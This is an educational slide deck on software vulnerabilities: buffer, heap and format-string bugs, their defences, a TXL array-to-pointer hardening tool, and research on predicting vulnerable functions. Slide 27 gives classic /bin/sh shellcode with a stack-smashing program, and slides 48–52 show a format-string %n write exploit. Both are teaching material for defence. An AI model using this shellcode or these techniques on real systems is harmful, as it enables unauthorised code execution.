Software Vulnerabilities: Definition, Classification, and Prevention - PowerPoint PPT Presentation

Loading...

PPT – Software Vulnerabilities: Definition, Classification, and Prevention PowerPoint presentation | free to view - id: 47212c-NmNkM



Loading


The Adobe Flash plugin is needed to view this content

Get the plugin now

View by Category
About This Presentation
Title:

Software Vulnerabilities: Definition, Classification, and Prevention

Description:

Software Vulnerabilities: Definition, Classification, and Prevention Overview What are software vulnerabilities? Types of vulnerabilities Buffer Overflows Format ... – PowerPoint PPT presentation

Number of Views:197
Avg rating:3.0/5.0
Slides: 116
Provided by: spirosma
Category:

less

Write a Comment
User Comments (0)
Transcript and Presenter's Notes

Title: Software Vulnerabilities: Definition, Classification, and Prevention


1
Software VulnerabilitiesDefinition,
Classification, and Prevention
2
Overview
  • What are software vulnerabilities?
  • Types of vulnerabilities
  • Buffer Overflows
  • Format String Vulnerabilities
  • How to find these vulnerabilities and prevent
    them?
  • Classes of software vulnerabilities

3
What Are Software Vulnerabilities?
  • A software vulnerability is an instance of a
    fault in the specification, development, or
    configuration of software such that its execution
    can violate the (implicit or explicit) security
    policy.

4
Types of Software Vulnerabilities
  • Buffer overflows
  • Smash the stack
  • Overflows in setuid regions
  • Heap overflows
  • Format string vulnerabilities

5
Buffer Overflows
  • Definition, Examples, and Defenses

6
What is a Buffer?
  • Example
  • A place on a form to fill in last name where each
    character has one box.
  • Buffer is used loosely to refer to any area of
    memory where more than on piece of data is stored.

7
Buffer Overflows 5
  • The most common form of security vulnerability in
    the last 10 years
  • 1998 2 out of 5 remote to local attacks in
    Lincoln Labs Intrusion Detection Evaluation were
    buffer overflows.
  • 1998 9 out of 13 CERT advisories involved buffer
    overflows.
  • 1999 at least 50 of CERT advisories involved
    buffer overflows.

8
How Does a Buffer Overflow Happen?
  • Reading or writing past the end of the buffer ?
    overflow
  • As a result, any data that is allocated near the
    buffer can be read and potentially modified
    (overwritten)
  • A password flag can be modified to log in as
    someone else.
  • A return address can be overwritten so that it
    jumps to arbitrary code that the attacker
    injected (smash the stack) ? attacker can control
    the host.

9
Two Steps
  • Arrange for suitable code to be available in the
    programs address space (buffer)
  • Inject the code
  • Use code that is already in the program
  • Overflow the buffer so that the program jumps to
    that code.

10
Inject the Code
  • Use a string as input to the program which is
    then stored in a buffer.
  • String contains bytes that are native CPU
    instructions for attacked platform.
  • Buffer can be located on the stack, heap, or in
    static data area.

11
Code Already in Program
  • Only need to parameterize the code and cause the
    program to jump to it.
  • Example
  • Code in libc that executes exec(arg), where arg
    is a string pointer argument, can be used to
    point to /bin/sh and jump to appropriate
    instructions in libc library.

12
Jump to Attack Code
  • Activation record
  • stack smashing attack
  • Function pointer
  • Longjpm(3) buffer

13
Memory Regions 4
14
Code/text Segment
  • Static
  • Contains code (instructions) and read-only data
  • Corresponds to text section of executable file
  • If attempt to write to this region ? segmentation
    violation

15
Data Segment
  • Permanent data with statically known size
  • Both initiated and uninitiated variables
  • Corresponds to the data-bss sections of the
    executable file
  • brk(2) system call can change data segment size
  • Not enough available memory ? process is blocked
    and rescheduled with larger memory

16
Heap
  • Dynamic memory allocation
  • malloc() in C and new in C ? More flexibility
  • More stable data storage memory allocated in
    the heap remains in existence for the duration of
    a program
  • Data with unknown lifetime global (storage
    class external) and static variables

17
Stack I 3
  • Provides high-level abstraction
  • Allocates local variables when a function gets
    called (with known lifetime)
  • Passes parameters to functions
  • Returns values from functions
  • Push/Pop operations (LIFO) implemented by CPU
  • Size dynamically adjusted by kernel at runtime

18
Stack II
  • Stack Pointer (SP) TOP of stack (or next free
    available address)
  • Fixed address BOTTOM of stack
  • Logical Stack Frame (SF) contains parameters to
    functions, local variables, data to recover
    previous SF (e.g instruction pointer at time of
    function call)
  • Frame Pointer (FP)/local Base Pointer (BP)
    Beginning of Activation Record (AR), used for
    referencing local variables and parameters
    (accessed as offsets from BP)

19
Activation Record 5
  • Contains all info local to a single invocation of
    a procedure
  • Return address
  • Arguments
  • Return value
  • Local variables
  • Temp data
  • Other control info

20
Accessing an Activation Record (AR)
  • Base pointer beginning of AR
  • Arguments are accessed as offsets from bp
  • Environment pointer pointer to the most recent
    AR (usually a fixed offset from bp)
  • Stack pointer top of AR stack
  • Temporaries are allocated on top on stack

21
When a Procedure is Called
  • Previous FP is saved
  • SP is copied into FP ? new FP
  • SP advances to reserve space for local variables
  • Upon procedure exit, the stack is cleaned up

22
Function Pointer
  • Find a buffer adjacent to function pointer in
    stack, heap or static data area
  • Overflow buffer to change the function pointer so
    it jumps to desired location
  • Example attack against superprobe program - Linux

23
Longjpm Buffer
  • setjmp(buffer) to set a checkpoint
  • longjmp(buffer) to go back to checkpoint
  • Corrupt state of buffer so that longjmp(buffer)
    jumps to the attack code instead

24
Example
  • pushl 3
  • pushl 2
  • pushl 1
  • call function
  • pushl ebp
  • movl esp,ebp
  • subl 20,esp
  • void function(int a, int b, int c)
  • char buffer15
  • char buffer210
  • void main()
  • function(1,2,3)

25
Buffer Overflow Example
  • void function(int a, int b, int c)
  • char buffer15
  • char buffer210
  • int ret
  • ret buffer1 12
  • (ret) 8
  • void main()
  • int x
  • x 0
  • function(1,2,3)
  • x 1
  • printf("d\n",x)

26
Result of Program
  • Output 0
  • Return address has been modified and the flow of
    execution has been changed
  • All we need to do is place the code that we are
    trying to execute in the buffer we are
    overflowing, and modify the return address so it
    points back to buffer

27
Example 6
  • char shellcode \xeb\x1f\x5e\x89\x76\x08\x31\
    xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
    \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\
    x89\xd8\x40\xcd
  • x80\xe8\xdc\xff\xff\xff/bin/sh
  • char large_string128
  • void main()
  • char buffer96
  • int i
  • long long_ptr (long ) large_string /
    long_ptr takes the address of large_string /
  • / large_strings first 32 bytes are filled with
    the address of buffer /
  • for (i 0 i lt 32 i)
  • (long_ptr i) (int) buffer
  • / copy the contents of shellcode into
    large_string /
  • for (i 0 i lt strlen(shellcode) i)
  • large_string i shellcode i
  • / buffer gets the shellcode and 32 pointers
    back to itself /
  • strcpy(buffer, large_string)

28
Example Illustrated 6
Process Address Space
argc
user stack
RA
sfp
long_ptr
i
buffer
large_string128
Shellcode
heap
bss
29
Buffer Overflows Defenses
  • Writing correct code (good programming practices)
  • Debugging Tools
  • Non-executable buffers
  • Array bounds checking
  • Code pointer integrity checking (e.g., StackGuard)

30
Problems with C
  • Some C functions are problematic
  • Static size buffers
  • Do not have built-in bounds checking
  • While loops
  • Read one character at a time from user input
    until end of line or end of file
  • No explicit checks for overflows

31
Some Problematic C Functions 2
Function Severity Solution Use
gets Most Risky fgets(buf, size, stdin)
strcpy, strcat Very Risky strncpy, strncat
sprintf, vsprintf Very Risky snprintf, vsnprintf or precision specifiers
scanf family Very Risky precision specifiers or do own parsing
realpath, syslog Very Risky (depending on implementation) Maxpathlen and manual checks
getopt, getopt_long, getpass Very Risky (depending on implementation) Truncate string inputs to reasonable size
32
Good Programming Practices I
DO NOT USE Instead USE
void main( ) char buf 40 gets(buf) void main( ) char buf 40 fgets(buf,40,stdin)
33
Good Programming Practices II
DO NOT USE Instead USE
void main() char buf4 char src8 "rrrrr" strcpy(buf,src) if (src_size gt buf_size) coutltlt "error" return(1) else strcpy(buf,src) OR strncpy(buf,src,buf_size - 1) bufbuf_size - 1 '\0'
34
Debugging Tools
  • More advanced debugging tools
  • Fault injection tools inject deliberate buffer
    overflow faults at random to search for
    vulnerabilities
  • Static analysis tools detect overflows
  • Can only minimize the number of overflow
    vulnerabilities but cannot provide total assurance

35
Non-executable Buffers 7,8
  • Make data segment of programs address space
    non-executable ? attacker cant execute code
    injected into input buffer (compromise between
    security and compatibility)

36
Non-executable Buffers 7,8
  • If code already in program, attacks can bypass
    this defense method
  • Kernel patches (Linux and Solaris) make stack
    segment non-executable and preserve most program
    compatibility

37
Array Bounds Checking
  • Attempts to prevent overflow of code pointers
  • All reads and writes to arrays need to be checked
    to make sure they are within bounds (check most
    array references)
  • Campaq C compiler
  • Jones Kelly array bound checking
  • Purify memory access checking
  • Type-safe languages (e.g., Java)

38
Code Pointer Integrity Checking
  • Attempts to detect that a code pointer has been
    corrupted before it is de-referenced
  • Overflows that affect program state components
    other than code pointer will succeed
  • Offers advantages in performance, compatibility
    with existing code and implementation effort
  • Hand-coded stack introspection
  • StackGuard ? PointGuard

39
StackGuard
  • Compiler technique that provides protection by
    checking the return address in AR
  • When detects an attack ? causes app to exit,
    rather than yielding control to attacker
  • Terminator canary
  • Random canary

40
Heap Overflows
  • Harder to exploit, yet still common
  • Need to know which variables are security
    critical
  • Cause a buffer overflow to overwrite the target
    variables (generally buffer needs to have lower
    address)

41
Example
  • void main(int argc, char argv)
  • char super_user (char )malloc(sizeof(char)9)
  • char str (char )malloc(sizeof(char)4)
  • char tmp
  • super_user super_user - 40
  • strcpy(super_user, "viega")
  • if (argc gt 1)
  • strcpy(str, argv1)
  • else
  • strcpy(str,"xyz")
  • tmp str
  • while(tmp lt super_user 12)
  • printf("p c (0xx)\n", tmp, isprint(tmp) ?
    tmp '?', (unsigned int)(tmp))
  • tmp1

42
Output
43
Output After Overflow
44
Format String Vulnerabilities I 9
  • Caused by design misfeatures in the C standard
    library combined with problematic implementation
    (bad programming habits!)
  • printf family (syslog, printf, fprintf, sprintf,
    and snprintf) format string tells the function
    the type and sequence of arguments to pop and the
    format for output
  • Hostile input can be passed directly as the
    format string for calls to printf functions

45
Format String Vulnerabilities II
  • Attacker can write arbitrary values to (almost
    any) arbitrary addresses in memory
  • Overwrite a stored UID for a program that drops
    and elevates privileges
  • Overwrite an executed command
  • Overwrite a return address so it points to a
    buffer with shell code in it
  • ? OWN the program

46
Format String By Example fmtme.c
  • int main(int argc, char argv)
  • char buf100
  • int x
  • if(argc ! 2)
  • exit(1)
  • x 1
  • snprintf(buf, sizeof buf, argv1)
  • bufsizeof buf - 1 0
  • printf("buffer (d) s\n", strlen(buf), buf)
  • printf("x is d/x (_at_ p)\n", x, x, x)
  • return 0

47
Stack Layout of Program
  • When snprintf function is called

48
Exploiting the Program I
  • Test 1
  • ./fmtme "hello world
  • buffer (11) hello world
  • x is 1/0x1 (_at_0x804745c)

49
Exploiting the Program II
  • Test 2 print integers on stack above format
    string
  • ./fmtme "x x x x
  • buffer (15) 1 f31 1031 3133
  • x is 1/0x1 (_at_0x804745c)
  • 4 values of output the variable x and three
    4-byte integers taken from the uninitialized buf
    variable

50
Exploiting the Program III
  • Test 3 control the values stored in the buffer
  • ./fmtme "aaaa x x
  • buffer (15) aaaa 1 61616161
  • x is 1/0x1 (_at_0x804745c)
  • The 4 'a' characters we provided were copied to
    the start of the buffer and interpreted by
    snprintf as an integer argument with the value
    0x61616161 ('a' is 0x61 in ASCII)

51
Exploiting the Program V
  • Test 4
  • ./fmtme "\x58\x74\x04\x08dn"
  • buffer (5) X1
  • x is 5/x05 (_at_0x8047458)

52
Exploiting the Program V (contd.)
  • snprintf copies the first 4 bytes into buf, scans
    the "d" format and prints out the value of x,
    and reaches the "n" directive
  • Pulls the next value off the stack, which comes
    from the first 4 bytes of buf. These 4 bytes have
    just been filled with "\x58\x74\x04\x08", or,
    0x08047458
  • Writes amount of bytes output so far, 5, into
    this address

53
Solutions
  • Remove the n feature
  • Permit Only Static Format Strings
  • Count the Arguments to printf
  • FormatGuard

54
References
  • 1 https//www.cerias.Purdue.edu/techreports-ssl/
    public/98-09.pdf
  • 2 Building Secure Software, Viega and McGraw
  • 3 Smashing the Stack for Fun and Profit, Aleph
    One
  • 4 Stony Brook State University of New York
    (http//www.cs.sunysb.edu/cse304)

55
References
  • 5 Buffer Overflows Attacks and Defenses for
    the Vulnerability of the Decade
    (http//www.cse.ogi.edu/DISC/projects/immunix
  • 6www.cs.utexas.edu/users/deepakku/security/secur
    ity.ppt
  • 7http//www.cse.ogi.edu/DISC/projects/immunix/St
    ackGuard/usenixsc98_html/node21.html

56
References
  • 8http//docs.sun.com/db/doc/816-4883/6mb2joasj?a
    view
  • 9 Format String Attacks, Tim Newsham, Guardent,
    Inc. 2000

57
Other Useful Resources
  • "How to Write Buffer Overflows" by "Mudge, 1997
  • "Stack Smashing Vulnerabilities in the UNIX
    Operating System" by Nathan P. Smith, 1997
  • "The Tao of Windows Buffer Overflows" by
    "DilDog, 1998

58
Gemini Using Program Transformation to Secure C
Programs Against Buffer Overflows
59
Overview
  • Motivation
  • TXL
  • Transformation process
  • Case study results
  • Conclusion future work

60
Motivation
  • Stack buffer overflows most common security
    vulnerability found in C code
  • The most popular e-mail, web and DNS software is
    open-source C code
  • Stack buffer overflows approx. account for 50 of
    security vulnerabilities since 1997

61
Motivation
  • Stack Buffer Overflows
  • Strings grow opposite of stack
  • Return address is above strings in memory
  • Overwriting a string can overwrite return address
  • Prevention
  • Transforming local arrays to pointer-to-arrays
    in a way that
  • Relieves the need for programmer intervention
  • Relieves the need for specific compilers
  • Minimizes run-time overhead

62
Stack Buffer Overflows
  • void func(char str1, char str2)
  • char buf80
  • strcpy(buf, str1)

63
In a Nutshell
  • Transform every array that occurs in a function
    to a pointer
  • Preserve the original semantics
  • Both good and bad (where possible)
  • Pointer arithmetic should still work
  • Returning de-allocated memory should still work

64
In a Nutshell
Array ? Pointer-to-Array
65
TXL
  • Text transformation tool
  • Provide TXL with an EBNF grammar, a set of
    transformations for that grammar and input text
  • Generates scanner and parser at run-time
  • After applying transformations, outputs resulting
    text
  • Strongly typed
  • Guarantees Syntactic equivalence, but not
    semantic equivalence

66
TXL
2001 J. Cordy
67
TXL example
  • Objective
  • Replace occurrences of strcpy(s1, s2)by
    strncpy(s1, s2, sizeof(s1))
  • TXL Rule

rule fixStrcpy Declarations repeat
compound_statement_body replace
postfix_expression strcpy '( ToBuf
unary_expression ', FromBuf argument_expression
') where not Declarations
checkPointer ToBuf by strncpy
'( ToBuf ', FromBuf ', sizeof ToBuf ') end rule
68
A Parse Tree
include ltstdio.hgt include ltstring.hgt void
main(int argc, char argv) char foo5
char ptr strcpy(foo, argv0)
printf("s\n", ptr)
69
TXL Transformation
  • Assumptions
  • Globals, pointers, static and extern variables
    are not vulnerable to stack buffer overflows
  • We will only be given compileable C code
  • This is sometimes not the case with systems that
    use the autoconf package
  • Transformation Steps
  • Declaration expansion
  • typedef Flattening
  • Declaration Transformation
  • sizeof Alias Declarations
  • Add free and Transform return and sizeof
  • Initialization Functions

70
1. Declaration expansion
  • Makes transformation process easier

71
2. typedef Flattening
  • Removes type aliases
  • Distributes aliased array dimensions
  • Provides a way to differentiate statements from
    declarations
  • C is ambiguous about declarations and statements

72
Declaration/Statement Ambiguity
  • void main()
  • typedef char buf5
  • buf (s)
  • printf (s)
  • This ambiguity makes some pre-processing
    impossible

73
3. Declaration Transformation
  • Pre-process Variable Declarations
  • Adding parentheses around a declarator doesnt
    change the semantics, but it does change the
    syntax
  • Remove extraneous parentheses
  • Simplifies declarations
  • Groups array dimensions
  • Transform Arrays to Pointers
  • Generate Pointer Initialization

74
A. Pre-process Variable Declarations
Ambiguity parsing declarations buf(s) and
printf(s) can result in the same parse tree
75
B. Transform Arrays to Pointers
  • Transform array declarations to pointer to
    array
  • Create an initialization functions to each array
  • Create temporary variables to hold the original
    array sizes In ISO C99, array sizes can be
    variable sized (an expression)

76
C. Generate Pointer Initialization
  • Replace the declaration with a
  • pointer to an array, removing
  • the initializer
  • Pointer Initialization function
  • Generate a new declaration with
  • a unique name, and the same
  • initializer
  • Create a function which contains
  • calloc and memcpy

77
4. sizeof Alias Declarations
  • sizeof allows for expressions, not just types
  • Memory assigned to pointer is architecture
    dependent, always constant
  • Violates semantic preservation

?
78
sizeof Alias Declarations
  • Generate new declaration with original array
  • dimensions to replace all sizeof references

79
5. Add free and Transform return and sizeof
  • Fix return statements and insert free statements
  • A return may reference a transformed array
  • If necessary, store expression in temporary
    variable, insert free statements for current
    scope, return temporary variable
  • 3 cases
  • End of scope without a return statement
  • return with an expression
  • return without an expression

80
Add free and Transform return and sizeof
  1. Fix return statements and insert free statements
  2. Fix sizeof constants

81
6. Insert Initialization Functions
  • Functions inserted at bottom of file, prototypes
    at top
  • Type flattening step removes possibility of a
    user defined type occurring in prototype, before
    actual declaration

82
Case Study Results (Most Recent)
Program Arrays Fixed (KLoC) Time Increase (? run-time) Regression Passed
apache 226 (94) 11.1 (0.001s) N/A
bind 2408 (298) 0.5 (2.690s) Yes
bison 56 (21) 1.8 (0.458s) Yes
find 47 (17) 0 (0.000s) Yes
flex 29 (18) 0 (0.000s) N/A
openssh 513 (56) 4.3 (7.233s) Yes
which 2 (2) 0 (0.000s) N/A
whois 7 (1) 32.4 (.153s) N/A
83
Conclusions and Future work
  • Limitations Future work
  • Extends transformation algorithm for struct
    declarations
  • Arrays of structs (done)
  • Arrays within structs (done)
  • Benefits
  • Current and future stack overflow attacks are
    guaranteed to fail when used against a
    transformed program

84
Characterizing the Security Vulnerability
Likelihood of Software Functions
85
Talk Outline
  • Section I
  • Manager/director detail
  • Why are we here?
  • Section II
  • User detail
  • What can we do?
  • Section III
  • Scientist detail
  • How do we do it?

86
What is a Software Security Vulnerability?
  • A software security vulnerability is a fault in
    the specification, implementation, or
    configuration of a software system whose
    execution can violate an explicit or implicit
    security policy.

87
Section I
  • Manager level detail
  • Software vulnerabilities are a problem how can
    we avoid them?

88
How are software security vulnerabilities avoided?
  • Safe programming languages
  • Type safe languages
  • Adequate software design
  • Security Policies
  • Thorough testing
  • Testing with a high percentage of code coverage
  • Security auditing
  • Design
  • Implementation

89
Auditing for Software Security
  • Pre-release software development practices
    unlikely to change
  • Safe languages
  • Adequate software design
  • Thorough testing
  • Post-release auditing typically used if warranted

90
Security Auditing Issues
  • Large scale auditing infeasible due code size
  • Good source code will have 1-3 bugs for every 100
    lines of code Beizer
  • Security Auditors need to find the software
    security vulnerabilities in the bugs
  • Security audits would benefit from a tool that
    identify areas that are likely vulnerable

91
Improving the Security Audit
  • Provide a tool built on statistical measurements
  • Cut down the amount of code needed to be reviewed
  • Ensure high degree of accuracy
  • Bottom line Complexity reduction

92
Section II
  • User level detail
  • How can our tools and research help the security
    auditor?

93
The FLF Hypothesis
  • Our hypothesis is that a small percentage of
    functions near a source of input are more likely
    to contain software security vulnerabilities
  • These functions are known as Front Line Functions

FLF
FLF
FLF
Input
94
Front Line Functions
  • 60 Code Reduction
  • No auditor time required
  • High degree of accuracy

95
Discovering the FLF measurement
  • Collect software systems with known
    vulnerabilities
  • Perform detailed static analyses of software
    systems
  • Calculate areas of likely vulnerability from
    information gathered during static analyses
  • Build tools around these calculations

96
How are these tools used?
  • Run static analysis tools on source code
  • A database of code facts is created
  • The database is used to find the likely
    vulnerable functions
  • The likely vulnerable functions are outputted and
    ranked by proximity to input source

97
Case Study OpenSSH
GOAL FLF Finder identifies large percentage of
modified functions
Code that was not change between revisions
82 of changed functions identified by FLF Finder
98
Section III
  • Scientist level detail
  • What is the process for creating the likely
    vulnerable measurement
  • How do we identify FLFs

99
The FLF Hypothesis (revisited)
  • Our hypothesis is that a small percentage of
    functions near a source of input are more likely
    to contain software security vulnerabilities
  • These functions are known as Front Line Functions

FLF
FLF
FLF
Input
100
Validating the FLF Hypothesis
  1. Gather a set of vulnerable software systems
    (Experimental Systems).
  2. Perform experiments on these systems with static
    analysis tools (GAST-MP SGA)
  3. Identify all functions which initiate user input
    transactions (Inputs)
  4. Identify all functions which are vulnerable
    (Targets)
  5. Calculate FLF Density (FLF Density)
  6. Test the FLF Density on a set of control systems
    (Verification)
  7. Create a tool that utilizes the FLF Density (FLF
    Finder).

101
Experimental Systems
  • 30 open source systems
  • 31 software security vulnerabilities
  • Each system has a single patch file which
    addresses one security vulnerability
  • Most recovered from Redhats source RPM
    distribution due to their incremental nature

102
Validating the FLF Hypothesis
  1. Gather a set of vulnerable software systems
    (Experimental Systems).
  2. Perform experiments on these systems with static
    analysis tools (GAST-MP SGA)
  3. Identify all functions which initiate user input
    transactions (Inputs)
  4. Identify all functions which are vulnerable
    (Targets)
  5. Calculate FLF Density (FLF Density)
  6. Test the FLF Density on a set of control systems
    (Verification)
  7. Create a tool that utilizes the FLF Density (FLF
    Finder).

103
GAST-MP SGA
  • GNU Abstract Syntax Tree Manipulation Program (
    GAST-MP )
  • Source Code Analysis tool
  • Operates on Gs Abstract Syntax Tree (AST)
  • AST can be outputted with the fdump-tree-flag
  • Creates a repository of code facts
  • System Graph Analyzer ( SGA )
  • Operates on the code fact repository
  • Identifies Inputs and Targets
  • Performs invocation analysis
  • Calculates FLF Density
  • Analysis of Categorical Graphs

104
Validating the FLF Hypothesis
  • Gather a set of vulnerable software systems
    (Experimental Systems).
  • Perform experiments on these systems with static
    analysis tools (GAST-MP SGA)
  • Identify all functions which initiate user input
    transactions (Inputs)
  • Identify all functions which are vulnerable
    (Targets)
  • Calculate FLF Density (FLF Density)
  • Test the FLF Density on a set of control systems
    (Verification)
  • Create a tool that utilizes the FLF Density (FLF
    Finder).

105
Finding Inputs
  • An Input is a function which contains reads in
    external user input
  • For example, read
  • A list of external function calls were compiled
    to properly identify Inputs
  • This list could be modified to contain
    application specific library calls

106
Validating the FLF Hypothesis
  1. Gather a set of vulnerable software systems
    (Experimental Systems).
  2. Perform experiments on these systems with static
    analysis tools (GAST-MP SGA)
  3. Identify all functions which initiate user input
    transactions (Inputs)
  4. Identify all functions which are vulnerable
    (Targets)
  5. Calculate FLF Density (FLF Density)
  6. Test the FLF Density on a set of control systems
    (Verification)
  7. Create a tool that utilizes the FLF Density (FLF
    Finder).

107
Finding Targets
  • A Target is any function that contains a known
    vulnerability
  • Targets are found by matching code facts on
    subtractive lines in a patch file with code facts
    in the repository generated by GAST-MP

--- channels.c 27 Feb 2002 212313
-0000 1.170 channels.c 4 Mar 2002 193758
-0000 1.171 _at__at_ -146,7 146,7 _at__at_ Channel
c - if (id lt 0 id gt channels_alloc) if
(id lt 0 id gt channels_alloc)
log("channel_lookup d bad id", id)
return NULL
108
Validating the FLF Hypothesis
  1. Gather a set of vulnerable software systems
    (Experimental Systems).
  2. Perform experiments on these systems with static
    analysis tools (GAST-MP SGA)
  3. Identify all functions which initiate user input
    transactions (Inputs)
  4. Identify all functions which are vulnerable
    (Targets)
  5. Calculate FLF Density (FLF Density)
  6. Test the FLF Density on a set of control systems
    (Verification)
  7. Create a tool that utilizes the FLF Density (FLF
    Finder).

109
FLF Density
  1. Create entire call graph G
  2. Transform G in DAG
  3. Label Input and Target Nodes
  4. Calculate invocation paths between Input and
    Target combinations and measure length
  5. Calculate FLF Density by normalizing path length
    by function cardinality
  6. For each system choose the largest FLF Density

110
Experimental Results
111
Experimental Results
  • Sample mean FLF Density 2.87
  • Therefore, a very small number of functions are
    actually likely to be vulnerable
  • Standard deviation of 1.87
  • The FLF density was consistent across our
    experimental systems
  • With 95 confidence the true mean is between
    2.23 and 3.51
  • There is a high probability that our experimental
    density is close to the TRUE FLF Density

112
Validating the FLF Hypothesis
  1. Gather a set of vulnerable software systems
    (Experimental Systems).
  2. Perform experiments on these systems with static
    analysis tools (GAST-MP SGA)
  3. Identify all functions which initiate user input
    transactions (Inputs)
  4. Identify all functions which are vulnerable
    (Targets)
  5. Calculate FLF Density (FLF Density)
  6. Test the FLF Density on a set of control systems
    (Verification)
  7. Create a tool that utilizes the FLF Density (FLF
    Finder).

113
Verification
  • The FLF Density can be used as a conservative way
    to highlight those vulnerability functions which
    do not have known vulnerabilities

114
Validating the FLF Hypothesis
  1. Gather a set of vulnerable software systems
    (Experimental Systems).
  2. Perform experiments on these systems with static
    analysis tools (GAST-MP SGA)
  3. Identify all functions which initiate user input
    transactions (Inputs)
  4. Identify all functions which are vulnerable
    (Targets)
  5. Calculate FLF Density (FLF Density)
  6. Test the FLF Density on a set of control systems
    (Verification)
  7. Create a tool that utilizes the FLF Density (FLF
    Finder).

115
FLF Finder
  • FLF Density can say what areas of code are
    statistically likely to be vulnerable
  • Automate tool to find these areas
  • Targets are not provided what do we do?
  • Assume all functions are targets
  • This extremely conservative assumption is still
    able to reduce 60 of code!

116
Conclusion
  • There is credibility to the FLF hypothesis
  • FLF Finder can pinpoint those areas of code which
    are statistically likely to be vulnerable
  • 60 code reduction
  • This will greatly improve the efficiency of
    security code auditors!
  • Efficiency improvements make auditing more
    appealing to software developers
About PowerShow.com